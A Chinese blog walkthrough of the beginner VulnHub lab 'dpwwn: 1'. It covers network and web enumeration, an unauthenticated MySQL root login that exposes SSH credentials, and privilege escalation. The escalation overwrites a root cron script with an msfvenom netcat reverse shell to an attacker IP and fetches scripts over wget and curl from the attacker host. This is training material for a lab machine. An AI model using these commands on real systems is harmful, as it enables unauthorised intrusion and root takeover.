『VulnHub系列』dpwwn: 1-Walkthrough

靶機地址
難度：初級
靶機發布日期：2019年8月4日

靶機描述：This boot2root is a linux based virtual machine and has been tested using VMware workstation 14.
The network interface of VM will take it’s IP settings from DHCP (Network Mode: NAT).
Goal: Gain the root privilege and obtain the content of dpwwn-01-FLAG.txt under /root Directory.
Note: Tested on VMware workstation 14.
Difficulty: Easy/helpful for beginners.

博客中如有任何問題，懇請批評指正，萬分感謝。個人郵箱：[email protected]

工具、知識點和漏洞

• nmap
• searchsploit
• metaspaloit

存疑、待解決

• 有沒有辦法讓gcc編譯的可執行文件在不同環境下運行？

0x00、信息收集

靶機IP：192.168.0.107

nmap -sP 192.168.0.0/24

端口和服務

nmap -sS -sV -T5 -A -p- 192.168.0.107

頁面、目錄枚舉

dirb http://192.168.0.107 -X .php,.txt,.zip,.html

python3 dirsearch.py -u http://192.168.0.107 -e .php,.txt,.zip,.html

gobuster dir -u http://192.168.0.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x .php,.txt,.html,.zip

http://192.168.0.107/info.php

從phpinfo裏面可以收集到的信息：

• 系統信息：Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686
• PHP版本信息：5.4.16
• webroot目錄：/var/www/html
• allow_url_fopen（on）和allow_url_include（off）
• asp_tags（off）
• extension_dir：/usr/lib/php/modules
• disable_functions：no value
• open_basedir：no value
• libxml版本：2.9.1

searchsploit php 5.4

searchsploit apache 2.4，無相關exp

0x01、MySQL未授權訪問

基本上已經對現有信息挨個進行了嘗試，除了MySQL。這個時候就得考慮一下我們有什麼？又可以做什麼？只要有可能性，就值得去嘗試。

嘗試登錄MySQL一下試試，因爲不知道密碼，所以輸入密碼的地方直接回車，結果進去了。

mysql -h 192.168.0.107 -u root -p

發現有一個數據庫叫ssh，隨後發現了用戶名和密碼

使用mistic/testP@$$swordmistic登錄ssh

0x02、提權

關於Linux提權，可以直接用腳本蒐集一下對於提權有用的信息，比如用linuxprivchecker.py、LinEnum.sh.

如果你想熟悉一下沒有腳本的情況下怎麼收集這些信息可以參考privilege_escalation_-_linux

先在kali上開啓HTTP服務

python -m SimpleHTTPServer 65534

使用wget下載linuxprivchecker.py腳本到靶機的tmp目錄

因爲本人所在的地理位置不允許直接訪問Github，所以我是從自己的kali下載的

cd /tmp
wget http://192.168.0.108:65534/Desktop/linuxprivchecker.py

爲了便於查看收集到的信息，我將結果輸出到report.txt文本中

python linuxprivchecker.py > report.txt

靶機做了這些後發現還是手動收集更快……，手動收集不到有效信息的情況下再嘗試用腳本。

SUID權限可執行文件，沒有可用的

find / -perm -u=s -type f 2>/dev/null

當前用戶可寫文件，發現一堆，但是極大多數都是沒用的，所以我先把結果輸出到文本文件，然後使用grep加上關鍵字去篩選。

find / -writable -type f 2>/dev/null >/tmp/report.txt
grep -Ev '/proc|/sys' /tmp/report.txt

查看計劃任務，發現logrot.sh這個腳本每三分鐘執行一次，以root權限執行

cat /etc/crontab

修改/home/mistic/logrot.sh的內容爲反彈shell

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.0.110 LPORT=1234 R

msfvenom默認無法自動補全，網上有辦法可以實現自動補全，有需要請自行搜索

kali上使用nc監聽1234端口，等待計劃任務的執行

嘗試內核提權

本來想kali上編譯好，然後上傳到靶機執行，結果編譯的時候出錯了，看了一下源碼，發現有裏面有兩個exp……

試了一下靶機上雖然wget不能用，但是curl卻是可以用的，kali上編譯好文件之後，使用curl下載文件到靶機，賦予可執行權限，運行時提示：無法執行二進制文件

Google了一下"bash cannot execute binary file"，說是兩種原因：第一種是沒有可執行權限；第二種是因爲是從其他編譯環境中拷貝過來的文件。就此作罷。

如果你有其他的方法，歡迎留言。要是有寫錯了的地方，請你一定要告訴我。要是你覺得這篇博客寫的還不錯，歡迎分享給身邊的人。更多VulnHub靶機的Walkthrough，請訪問本人博客(https://blog.csdn.net/weixin_44214107)。歡迎掃描下方個人微信二維碼與我交流。我是ins1ght.